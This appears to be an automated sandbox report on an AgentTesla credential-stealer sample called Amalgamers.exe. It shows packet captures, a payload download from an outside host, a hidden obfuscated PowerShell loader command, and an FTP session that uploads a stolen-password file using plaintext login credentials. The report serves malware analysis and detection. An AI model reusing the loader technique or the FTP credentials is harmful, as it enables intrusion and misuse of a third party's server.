Nov 9, 2024 20:47:11.376101971 CET	49819	21	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:12.126977921 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:12.127192020 CET	49819	21	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:12.132014036 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:12.387361050 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:12.389625072 CET	49819	21	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:12.394354105 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:12.713813066 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:12.714898109 CET	49819	21	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:12.719691992 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:12.975193977 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:12.975423098 CET	49819	21	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:12.980310917 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:13.235774040 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:13.235918045 CET	49819	21	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:13.240782022 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:13.496486902 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:13.496649027 CET	49819	21	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:13.501627922 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:13.757342100 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:13.758055925 CET	49835	35643	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:13.762873888 CET	35643	49835	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:13.762938023 CET	49835	35643	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:13.762980938 CET	49819	21	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:13.767704010 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:14.514755964 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:14.515002966 CET	49835	35643	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:14.515065908 CET	49835	35643	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:14.519773006 CET	35643	49835	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:14.520247936 CET	35643	49835	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:14.520298958 CET	49835	35643	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:14.569473982 CET	49819	21	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:14.776060104 CET	21	49819	86.107.36.93	192.168.2.4
Nov 9, 2024 20:47:14.819468021 CET	49819	21	192.168.2.4	86.107.36.93
Nov 9, 2024 20:47:19.172878027 CET	80	49797	185.36.171.17	192.168.2.4
Nov 9, 2024 20:47:19.172935963 CET	49797	80	192.168.2.4	185.36.171.17

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 9, 2024 20:47:06.957176924 CET	52403	53	192.168.2.4	1.1.1.1
Nov 9, 2024 20:47:07.004362106 CET	53	52403	1.1.1.1	192.168.2.4
Nov 9, 2024 20:47:11.266045094 CET	58890	53	192.168.2.4	1.1.1.1
Nov 9, 2024 20:47:11.367460966 CET	53	58890	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 9, 2024 20:47:06.957176924 CET	192.168.2.4	1.1.1.1	0xf12d	Standard query (0)	abreo.pl	A (IP address)	IN (0x0001)	false
Nov 9, 2024 20:47:11.266045094 CET	192.168.2.4	1.1.1.1	0x3d45	Standard query (0)	ftp.carbognin.it	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 9, 2024 20:47:07.004362106 CET	1.1.1.1	192.168.2.4	0xf12d	No error (0)	abreo.pl		185.36.171.17	A (IP address)	IN (0x0001)	false
Nov 9, 2024 20:47:11.367460966 CET	1.1.1.1	192.168.2.4	0x3d45	No error (0)	ftp.carbognin.it		86.107.36.93	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

abreo.pl

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49797	185.36.171.17	80	600	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 9, 2024 20:47:07.016972065 CET	168	OUT	GET //CNDKMREh44.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: abreo.pl Cache-Control: no-cache
Nov 9, 2024 20:47:08.054354906 CET	1031	IN	HTTP/1.1 301 Moved Permanently Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html content-length: 795 date: Sat, 09 Nov 2024 19:47:07 GMT server: LiteSpeed location: https://abreo.pl//CNDKMREh44.bin Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49803	185.36.171.17	443	600	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 19:47:09 UTC	192	OUT	GET //CNDKMREh44.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: abreo.pl Connection: Keep-Alive
2024-11-09 19:47:09 UTC	496	IN	HTTP/1.1 200 OK Connection: close cache-control: public, max-age=0 expires: Sat, 09 Nov 2024 19:47:09 GMT content-type: application/octet-stream last-modified: Wed, 30 Oct 2024 05:27:35 GMT accept-ranges: bytes content-length: 241728 date: Sat, 09 Nov 2024 19:47:09 GMT server: LiteSpeed vary: User-Agent alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-09 19:47:09 UTC	872	IN	Data Raw: c0 f2 86 66 79 69 20 08 21 35 6b 9b 95 76 74 e6 a7 74 dd d9 0b e3 b6 9e b7 57 63 74 c4 95 fa d6 c2 8d 40 43 d8 75 36 20 c0 b9 3b 75 16 3e a9 90 ec b9 87 83 c9 41 75 c6 33 63 b5 e9 fc cb 3e 43 c6 ae 1e 81 31 52 5c fd c2 f7 c1 ab 39 85 e5 e4 e3 84 65 ab 8e 76 fc b6 2b dd 33 57 af 4f be cd db 55 6c 84 27 9d 36 7d 92 17 5b 54 e0 4f 8a 73 4c ee b5 0a 1d 8b 12 d1 92 d6 d4 a6 52 9a 75 3a 7e a5 68 ce 32 44 02 c0 f6 6d 0d 39 f3 8d 44 db 2b ad c1 7f 1c cc 7d 00 97 1b c6 49 24 e2 0c 28 c4 12 37 19 8c 51 f3 49 10 e2 98 ad 08 00 d6 c4 a3 b3 88 85 f8 18 e4 59 8e 29 1f f9 0f f2 76 da 04 20 3f bd 21 c8 57 1a c3 22 57 cd 7f 8c 44 72 cf fd 12 21 b0 ae 6c 07 d9 fd e2 e2 7d 66 ce ef 4a 58 95 c8 5b 76 0a c2 bb 22 ce 02 e6 25 49 90 e7 d2 73 95 e8 89 7c 8c ab b6 26 55 ff 49 f8 Data Ascii: fyi !5kvttWct@Cu6 ;u>Au3c>C1R\9ev+3WOUl'6}[TOsLRu:~h2Dm9D+}I$(7QIY)v ?!W"WDr!l}fJX[v"%Is\|&UI
2024-11-09 19:47:09 UTC	14987	IN	Data Raw: 1d d6 82 4e ee e0 5a 52 2b a1 49 f7 5f ad 54 a7 94 1a 7d 74 3b 19 6b ee a4 3c 8f 4a 06 7d 7d be 56 1b 00 bf 2b 57 e9 56 ca 57 d7 83 37 db 61 f9 75 7e 34 88 cb 09 2d a5 9e 64 33 dc 90 41 4f de 07 38 f6 10 ae 73 cb 94 02 d3 67 aa 92 5e 02 0b 6d bd a4 24 cc ae e3 02 2f 77 b0 5c 09 a9 e7 1c b2 14 4b 21 ab b0 15 7d 6a 71 03 44 62 0f 57 05 ef 5e 68 61 f8 e4 2d 44 3a f8 d6 1f d1 2c c0 24 49 24 3c 8d 31 31 58 72 cb d5 58 7e ad fb 49 f5 5d c0 17 25 40 fd 1d c9 73 84 4a 6f c2 12 e3 28 b2 4a 86 17 00 67 37 60 c9 3e a3 48 77 02 a6 9d f7 1a 58 d9 1a d4 65 09 e6 cc 2c ba 37 c1 3d 81 ce 54 dc c1 13 6a cf f2 a1 7c 2c 24 fb 00 5d a5 ce 9d 96 4f 55 50 00 1d 1a 5c 8a d8 5e 5d ca 17 d9 6e d4 f6 1b 15 e2 83 10 bb 2c d9 16 c4 c7 a0 e7 86 a2 b3 e0 20 78 f4 3b 44 9a e6 d9 1c 4e Data Ascii: NZR+I_T}t;k<J}}V+WVW7au~4-d3AO8sg^m$/w\K!}jqDbW^ha-D:,$I$<11XrX~I]%@sJo(Jg7`>HwXe,7=Tj\|,$]OUP\^]n, x;DN
2024-11-09 19:47:09 UTC	16384	IN	Data Raw: 8e c3 6e 67 dc e5 e6 ea c5 2b bd af 2a 67 fd ac 35 ab 36 02 28 c0 b4 6b cc cc 37 4e 24 72 49 99 51 95 f8 1f 8e 86 26 aa de 77 79 0a c1 1d ba a9 e4 3d a5 4d 99 d7 d1 01 4c 38 48 70 57 aa a0 e7 0b 11 82 2e c3 cd 9f d6 7f a7 fc 45 53 56 06 e1 e8 fe c9 2a b6 cb b3 94 46 83 e3 9c 0d 42 ed 73 5a 27 90 ca 0d 9c 11 65 5e 37 d3 70 db d5 e1 3e 3f 04 76 8f a7 99 80 ce 9c cc 85 d2 94 33 41 b4 53 ef 43 a4 6f 5a 0b 4d 9c 96 b8 12 ac 4c 4c 94 2b 91 7d 39 40 f7 f4 23 26 82 6f ef d7 17 1f 2a 81 e2 5f 6a 09 75 04 88 8b ea c3 94 41 d6 f2 f1 19 df 42 8d bc 82 4b 2a a1 b6 f6 87 a8 ac b3 d6 9f bf e8 dd 01 2a c7 58 98 d5 3f 78 0f 5a c6 88 3f 7e 72 73 89 0e 1b 71 00 c3 c2 f3 4e 1f c1 d7 87 6b 09 0b 4f 99 32 55 15 ec 55 ca a1 87 19 7f 1a d5 75 4b d0 6c 27 9c 5d 42 9e e4 a1 d4 82 Data Ascii: ng+g56(k7N$rIQ&wy=ML8HpW.ESVFBsZ'e^7p>?v3ASCoZMLL+}9@#&o_juABK*X?xZ?~rsqNkO2UUuKl']B
2024-11-09 19:47:10 UTC	16384	IN	Data Raw: ad 1d 72 08 7a e1 2a bb 80 67 47 df ab 54 7c aa 03 87 27 30 8b af b3 ff b1 7a 1b 30 d0 e3 e0 f6 14 e9 53 aa 71 e1 f7 00 f2 88 d6 5b 65 c1 b1 63 c9 da 73 0d 9f 4d 57 80 72 48 71 cf d7 53 15 50 ae 6e 06 d2 fc e5 e1 7d c0 df ef 4a 50 8b cb 5b 76 0c c2 a5 e7 cc 02 e6 04 49 90 e7 32 f2 96 e8 89 3c 8d ab 96 a4 51 ff 4b fe df 48 98 b3 cd 70 30 e8 e4 6d 4e 0f 40 d8 62 ca 0c bf 89 97 44 84 5d 5b a8 6a a9 26 d0 f7 71 b2 e6 7b b3 46 3a 7b 66 3a 7a 96 05 c7 90 84 03 9f f7 25 bf 37 ed 4f 1b db 5e e1 41 32 2e a0 b9 3c 3f 83 13 99 7a 05 75 85 56 16 31 0a 90 54 0a 5c 47 12 0e 80 18 b0 42 c4 98 a6 00 75 12 b1 0c e5 a7 cb 73 86 f6 f7 3c 4b e9 76 f8 62 06 0b ef dd d5 62 96 94 c1 58 5d cb 5f 01 1a 92 f3 bb 43 6c c1 7a cc b8 f1 40 5b 21 a9 35 9a 26 5b 9f 4c 62 52 b4 0a 57 ad Data Ascii: rz*gGT\|'0z0Sq[ecsMWrHqSPn}JP[vI2<QKHp0mN@bD][j&q{F:{f:z%7O^A2.<?zuV1T\GBus<KvbbX]_Clz@[!5&[LbRW
2024-11-09 19:47:10 UTC	16384	IN	Data Raw: 9a 88 71 3b b3 0c 29 7f 60 ae 2d 8b 02 25 32 5d 02 61 5e b6 46 e8 da 82 46 d7 9e 44 c9 d5 41 70 3f be 9e f7 4a 66 37 62 a0 9d fe ae 7e d4 c0 4c 52 44 6f 22 37 14 5b 8d 2b 59 2b 56 96 f0 08 7e 28 46 58 0b e2 43 10 b9 56 2a 80 6d b4 71 d9 3d 7d 85 2b 2b b2 e3 45 6f 63 0d 03 2f 83 7e e3 a6 5b a6 b6 65 3a cb cb 28 93 c5 c0 8f 80 21 a5 e3 1b c3 de 8f 78 8b db af f8 c8 0b 4a 85 5f 1c ad 13 eb e3 1b 10 d2 9a 20 a3 43 36 fa 1b c3 b8 04 c3 f7 06 b3 55 c9 67 70 9d 32 b2 0c 4f 3e 75 2e 1c db 56 ed 46 ed c2 11 5b 0a 9a 8f f5 ab d5 74 ae a2 fd 31 3c 20 6a 14 f5 12 eb 3d 58 89 b5 a1 60 5c b9 29 38 e4 bf e0 2c 65 f0 94 7e 11 61 a4 58 b9 31 b9 3e dd 07 f8 7c 68 64 bf ca b2 3e f5 60 6e f9 71 0a a0 bf 38 b2 b1 62 e3 64 cc c6 54 6f 60 7b e5 b0 8f 73 3e 86 31 0f 52 4e 97 70 Data Ascii: q;)`-%2]a^FFDAp?Jf7b~LRDo"7[+Y+V~(FXCV*mq=}++Eoc/~[e:(!xJ_ C6Ugp2O>u.VF[t1< j=X`\)8,e~aX1>\|hd>`nq8bdTo`{s>1RNp
2024-11-09 19:47:10 UTC	16384	IN	Data Raw: 3a 6a 6c 3d 19 f2 91 f7 f6 ce c4 e2 29 7b f7 15 eb ed 6f 11 da 36 45 17 bd 8d 51 bc b5 72 1a d2 aa 2a cd 7c 38 c7 09 4f e8 68 79 84 8b 64 73 02 87 6d db 82 b0 a4 ed 5a 72 6a a1 49 f7 31 8d 55 a7 b1 1a 25 f9 13 19 6b ef 7e 32 81 4a 58 7d 7d be d5 98 01 bf a5 c4 01 3f b9 f8 d6 8d 27 db 13 76 42 9e c1 46 4f 75 bc 26 08 3b c1 eb fb 9e 92 e8 05 8a 89 4b ca b5 10 7c d9 49 cd ed 41 fa 0b 56 f5 92 cc ea bb ed 51 49 db 9e d1 f8 fc c2 a1 d1 5b 4a 2c 27 e7 d9 4c 7a 61 89 0b 4d 60 67 7b 07 e3 69 98 26 08 1d d9 65 38 fc d2 8b f3 fb c4 27 45 59 3c c6 cf c8 ac 53 38 f3 d9 44 9a 6f 92 5f 25 63 ae c3 33 86 88 b5 73 7a 44 7d c2 32 1c 28 b2 ca 78 19 14 e7 8f b6 35 3e a3 b6 fb 0c 26 63 7b 8e 58 48 3a 74 9a 09 66 f2 7f b9 b7 41 43 8d 95 3a 43 af 6b 0f 7e a6 b1 5c 5e 41 b4 f6 Data Ascii: :jl=){o6EQr*\|8OhydsmZrjI1U%k~2JX}}?'vBFOu&;K\|IAVQI[J,'LzaM`g{i&e8'EY<S8Do_%c3szD}2(x5>&c{XH:tfAC:Ck~\^A
2024-11-09 19:47:10 UTC	16384	IN	Data Raw: c3 aa a3 b3 53 00 76 97 95 32 a5 f7 21 30 af 5f d6 2f 0f 55 51 27 99 1b 0e 0b 18 72 06 66 85 78 c7 15 33 f9 2a 41 9c 4c 12 ec 13 f5 a4 08 6f 6a 09 ca 4f c5 e7 da 01 05 9a b1 c6 21 0d d6 60 96 68 a2 ed bb d2 14 4c 57 84 11 d2 04 4a 21 32 fd 6d 8f f1 56 e2 aa 4b cd 72 30 6c 1d 9f 4e ed 00 f6 98 48 a3 a5 43 c2 2f dd 34 8a 89 9e f4 e0 0a 02 8b 66 90 6c 87 d3 6b 76 03 f1 28 39 21 af 8a 03 70 2a 7b 2c 61 c9 15 0a e6 2f b4 1a 85 08 ce ec a6 66 17 8b 5a e8 bb 95 52 14 21 b0 d8 83 9b 8c cc df c8 3a 9f 18 b0 20 37 bf 64 bd 75 7e 95 bf d5 4b 97 11 58 15 af 69 21 30 df f3 89 7f 53 02 9d e9 80 b2 87 f9 ec 05 da 87 65 dd e9 d1 92 d2 98 cd 7d e6 54 d5 36 2f e3 35 76 fe 5d 66 02 70 23 d6 fb 27 dd 16 b4 e9 be 57 6a 01 2c 8b 87 01 80 5b fb 45 13 79 46 ed cf 11 60 43 ae 92 Data Ascii: Sv2!0_/UQ'rfx3ALojO!`hLWJ!2mVKr0lNHC/4flkv(9!p{,a/fZR!: 7du~KXi!0Se}T6/5v]fp#'Wj,[EyF`C
2024-11-09 19:47:10 UTC	16384	IN	Data Raw: 85 fe e1 86 11 77 0f 73 49 cf e8 ae a9 ab 85 cb 03 36 ca 8f bc 06 de 93 c7 83 b5 dd ec 50 f2 a2 5e 43 0a 0c 88 1c 2f 29 00 50 32 0c e8 73 6c 40 ca 1f 58 a8 71 9f 5a cc 90 fe a9 ec db c0 1d 87 0a 97 88 10 2d 6c 97 89 7f 4a fa 6d 2a ba 32 70 cf bb 9d 79 f5 5d 5e 44 a5 a8 6d 0f fb ff 33 7c 0b c2 8c c7 1c 42 ec e7 96 e2 ff 2b bd a5 a6 5a c7 89 45 83 08 fc 21 ca c7 6c b8 cc 31 25 b4 7a 49 93 0a ed f8 1f 8a 50 42 aa de 7d be 99 c1 1d 9a 98 e6 3d a5 b3 66 e0 e5 01 4c c6 3a cb 57 8a a6 95 f0 2d 7c 5f 84 66 9f d6 7b 2b fc 78 53 5d 5e da e8 fa eb 3d 8a c8 b9 de 75 42 1c 63 27 32 91 72 5a df f1 a6 0c 9c e5 49 4e 37 f3 74 25 db e1 c0 3e c3 58 8f a7 b9 73 c7 9c cc 5e a8 dd 05 41 b0 21 5c fa a4 1f 76 63 0a a1 9c b5 1c 1b 4c 48 b0 5c c6 40 39 ce d1 cd 23 26 76 11 d1 d4 Data Ascii: wsI6P^C/)P2sl@XqZ-lJm*2py]^Dm3\|B+ZE!l1%zIPB}=fL:W-\|_f{+xS]^=uBc'2rZIN7t%>Xs^A!\vcLH\@9#&v
2024-11-09 19:47:10 UTC	16384	IN	Data Raw: 7f 3e b7 1a dd d0 92 2c 07 77 70 9e e4 8b 0a 80 93 32 52 a2 f1 d4 f7 e1 86 c6 7a e5 1a 5a bd 6b ab 8e 76 c4 fd 95 22 cc 77 81 4f be cd 25 5b 7e 84 27 63 3a 6f 92 37 7e 54 e0 4f 74 72 75 d7 b5 0a 1d 75 1e d5 92 28 d8 ac d2 15 23 3a 70 b8 2c c9 32 f0 70 ce d7 d5 08 8b 32 a8 10 4d 4e d4 e1 80 38 a3 1a 70 8d be e6 2a 41 e5 f3 29 cd f5 55 7c a8 03 a0 27 30 8b 08 83 5e 4f 85 1a c2 ce ec c0 e1 15 e9 53 54 28 26 83 0f f2 76 24 5d 65 3f c6 ab c9 54 1e cc de b0 a8 81 80 47 72 97 72 4a 21 50 ac 15 d6 d2 fc ed 1c 71 cd cd c7 db 51 95 c2 a5 7f 0a c2 de 27 cd 02 e2 fb 45 95 e7 41 f9 94 e8 83 c2 80 a3 96 55 c7 fe 4b f2 f7 c6 99 b2 c7 8e 3d f8 d4 18 c4 10 44 d2 4a 5b 0d bf 92 9f cb 85 5d 51 a8 68 bb 26 16 b9 7d b2 69 2d 4d 4a 2e 00 81 3d 7a 92 6c 56 07 bd 0d 95 55 05 93 Data Ascii: >,wp2RzZkv"wO%[~'c:o7~TOtruu(#:p,2p2MN8p*A)U\|'0^OST(&v$]e?TGrrJ!PqQ'EAUK=DJ[]Qh&}i-MJ.=zlVU
2024-11-09 19:47:10 UTC	16384	IN	Data Raw: be ab 26 bf 35 64 d4 5e 89 6c 44 53 b4 0a a9 52 bf 12 14 cc 26 fe 8b d3 ce 17 62 2d 2e e4 f2 53 e4 df 42 13 46 9e f5 6e 93 e0 b0 5e c4 a2 ee bd 67 30 ba 82 43 02 3f 9e 01 9a fd cf 87 f6 f1 eb 32 d5 31 f6 2f c6 5c 33 28 e0 43 0a dc b4 aa 33 a7 ba c2 ee 21 ee 18 dd ec d9 91 be bd ac de 4c 91 91 96 88 69 47 b1 0c 29 27 60 ac 21 8b 02 2d 32 5d 02 61 51 86 54 e8 24 8e 3c ab be 45 c3 2b 4f 8e 3e a7 8e f7 4a 66 e9 6c aa 9d fe ae 7c de c0 4c 55 44 6f 22 37 1b 6b 24 2a a7 27 a1 9a d1 08 11 8e 46 a6 00 25 47 18 b9 6e 4c a1 6c b4 8f d4 cb 73 a4 8c 2b 4c e5 b2 61 41 18 fd 23 81 80 ca 56 5e a6 bc 9b 0c cd cb d6 9f fe 0b 49 72 de 5b ef e7 cf f4 94 b6 81 dc 6e 25 c4 09 c8 85 a1 01 8e 13 cb e2 1b ee dc b3 26 9b 72 1d d2 13 c3 46 23 3c f9 25 b3 26 4e 66 8e 9a f5 b6 08 4f Data Ascii: &5d^lDSR&b-.SBFn^g0C?21/\3(C3!LiG)'`!-2]aQT$<E+O>Jfl\|LUDo"7k$*'F%GnLls+LaA#V^Ir[n%&rF#<%&NfO

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 9, 2024 20:47:12.126977921 CET	21	49819	86.107.36.93	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Nov 9, 2024 20:47:12.127192020 CET	49819	21	192.168.2.4	86.107.36.93	USER server@carbognin.it
Nov 9, 2024 20:47:12.387361050 CET	21	49819	86.107.36.93	192.168.2.4	331 User server@carbognin.it OK. Password required
Nov 9, 2024 20:47:12.389625072 CET	49819	21	192.168.2.4	86.107.36.93	PASS 59Cif8wZUH#X
Nov 9, 2024 20:47:12.713813066 CET	21	49819	86.107.36.93	192.168.2.4	230 OK. Current restricted directory is /
Nov 9, 2024 20:47:12.975193977 CET	21	49819	86.107.36.93	192.168.2.4	504 Unknown command
Nov 9, 2024 20:47:12.975423098 CET	49819	21	192.168.2.4	86.107.36.93	PWD
Nov 9, 2024 20:47:13.235774040 CET	21	49819	86.107.36.93	192.168.2.4	257 "/" is your current location
Nov 9, 2024 20:47:13.235918045 CET	49819	21	192.168.2.4	86.107.36.93	TYPE I
Nov 9, 2024 20:47:13.496486902 CET	21	49819	86.107.36.93	192.168.2.4	200 TYPE is now 8-bit binary
Nov 9, 2024 20:47:13.496649027 CET	49819	21	192.168.2.4	86.107.36.93	PASV
Nov 9, 2024 20:47:13.757342100 CET	21	49819	86.107.36.93	192.168.2.4	227 Entering Passive Mode (86,107,36,93,139,59)
Nov 9, 2024 20:47:13.762980938 CET	49819	21	192.168.2.4	86.107.36.93	STOR PW_user-114127_2024_11_09_14_47_10.html
Nov 9, 2024 20:47:14.514755964 CET	21	49819	86.107.36.93	192.168.2.4	150 Accepted data connection
Nov 9, 2024 20:47:14.776060104 CET	21	49819	86.107.36.93	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.261 seconds (measured here), 1.19 Kbytes per second

Target ID:	0
Start time:	14:45:51
Start date:	09/11/2024
Path:	C:\Users\user\Desktop\Amalgamers.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Amalgamers.exe"
Imagebase:	0x400000
File size:	942'432 bytes
MD5 hash:	E2A5B947AC8266E79CC0C9FAFF051849
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:45:52
Start date:	09/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "
Imagebase:	0x1e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:45:52
Start date:	09/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:46:49
Start date:	09/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x7ff72bec0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	22.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.4%
Total number of Nodes:	1270
Total number of Limit Nodes:	27

Executed Functions

Function 0040320C Relevance: 93.1, APIs: 32, Strings: 21, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403231
GetVersion.KERNEL32 ref: 00403237
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040326A
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032A6
OleInitialize.OLE32(00000000), ref: 004032AD
SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032C9
GetCommandLineA.KERNEL32(Topfartens Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032DE
CharNextA.USER32(00000000,"C:\Users\user\Desktop\Amalgamers.exe",00000020,"C:\Users\user\Desktop\Amalgamers.exe",00000000,?,00000006,00000008,0000000A), ref: 0040331A
